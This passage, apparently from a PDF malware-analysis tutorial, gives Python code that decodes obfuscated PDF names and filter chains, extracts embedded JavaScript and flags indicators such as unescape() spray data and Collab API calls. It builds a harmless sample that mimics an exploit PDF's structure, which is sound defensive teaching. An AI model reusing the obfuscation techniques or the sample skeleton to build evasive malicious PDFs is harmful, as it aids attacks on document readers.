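    """Rewrite every name token in decoded form; this is why a search for
    'javascript' still hits /J#61va#53#63r#69#70#74."""
    return NAME_RE.sub(lambda m: decode_name(m.group(0)).encode('latin-1'), data)


def objects(pdf: bytes) -> dict:
    """Map object number -> raw body ('<<...>>' plus an optional stream)."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def filters_of(dictionary: bytes) -> list:
    """Read /Filter as either a single name or an array of names."""
    m = re.search(rb'/Filter\s*(\[[^\]]*\]|/\w+)', dictionary)
    return [n.decode() for n in re.findall(rb'/\w+', m.group(1))] if m else []


def apply_filters(data: bytes, filters: list) -> bytes:
    """The /Filter array lists decode steps in the order the reader applies
    them, so [/FlateDecode /ASCIIHexDecode] means inflate first, then hex-decode.
    These are encodings, not encryption: no key is involved."""
    for f in filters:
        if f == '/FlateDecode':
            data = zlib.decompress(data)
        elif f == '/ASCIIHexDecode':
            hexdigits = re.sub(rb'\s', b'', data.split(b'>', 1)[0])  # '>' ends the data
            if len(hexdigits) % 2:
                hexdigits += b'0'          # an odd trailing digit is padded with 0
            data = binascii.unhexlify(hexdigits)
        else:
            raise ValueError('filter not handled here: ' + f)
    return data


def stream_of(body: bytes) -> tuple:
    """Split an object body into (normalized dictionary, raw stream bytes).
    Assumes a direct /Length value, as in the constructed sample."""
    dictionary = normalize_names(body.split(b'stream', 1)[0])
    length = int(re.search(rb'/Length\s+(\d+)', dictionary).group(1))
    start = re.search(rb'stream\r?\n', body).end()
    return dictionary, body[start:start + length]


def extract_javascript(pdf: bytes):
    """Return (action object, stream object, decoded script) or None.
    Only the indirect '/JS N 0 R' form is followed, the case in the post."""
    objs = objects(pdf)
    for num, body in objs.items():
        norm = normalize_names(body)
        if not re.search(rb'/S\s*/JavaScript\b', norm):
            continue
        ref = re.search(rb'/JS\s+(\d+)\s+\d+\s+R', norm)
        if not ref:
            continue
        target = int(ref.group(1))
        dictionary, raw = stream_of(objs[target])
        script = apply_filters(raw, filters_of(dictionary))
        return num, target, script.decode('latin-1')
    return None


def triage(script: str) -> dict:
    """Indicators a defender pulls from decoded PDF JavaScript: unescape()
    calls, the longest run of %u-encoded data, and the reader APIs invoked."""
    runs = re.findall(r'(?:%u[0-9a-fA-F]{4})+', script)
    return {
        'unescape_calls': script.count('unescape('),
        'longest_u_run': max((len(r) for r in runs), default=0),
        'reader_apis': sorted(set(re.findall(r'\b(?:Collab|app|util)\.\w+', script))),
    }


# Constructed sample: a harmless script encoded through the same filter chain
# as the post's object 6 (hex first, then deflate, the reverse of decoding).
SAMPLE_JS = ('var p = unescape("%u0c0c%u0c0c");\n'
             'this.collabStore = Collab.collectEmailInfo({subj: "", msg: p});')
STREAM_DATA = zlib.compress(binascii.hexlify(SAMPLE_JS.encode('latin-1')) + b'>')
SAMPLE_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj\n<< /Type /Catalog /Open#41#63tion 5 0 R >>\nendobj\n"
    b"5 0 obj\n<< /#54#79pe /#41#63#74i#6fn /S /J#61va#53#63r#69#70#74 /#4a#53 6 0 R >>\nendobj\n"
    b"6 0 obj\n<< /Length " + str(len(STREAM_DATA)).encode()
    + b" /#46ilt#65r [ /#46#6c#61teDeco#64e /A#53C#49#49He#78Decod#65 ] >>\r\n"
    b"stream\r\n" + STREAM_DATA + b"\r\nendstream\nendobj\n"
)

if __name__ == '__main__':
    num, target, script = extract_javascript(SAMPLE_PDF)
    print('action object %d -> stream object %d' % (num, target))
    print(script)
    print(triage(script))
```

The indicators in triage() are the ones visible in the post's decoded script: unescape() blocks of %u data (the constructed script carries 12 characters of it, the post's carries thousands) and the reader API the script finally calls. Real samples also use other filters and inline /JS strings; this example deliberately leaves those to pdf-parser --filter.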


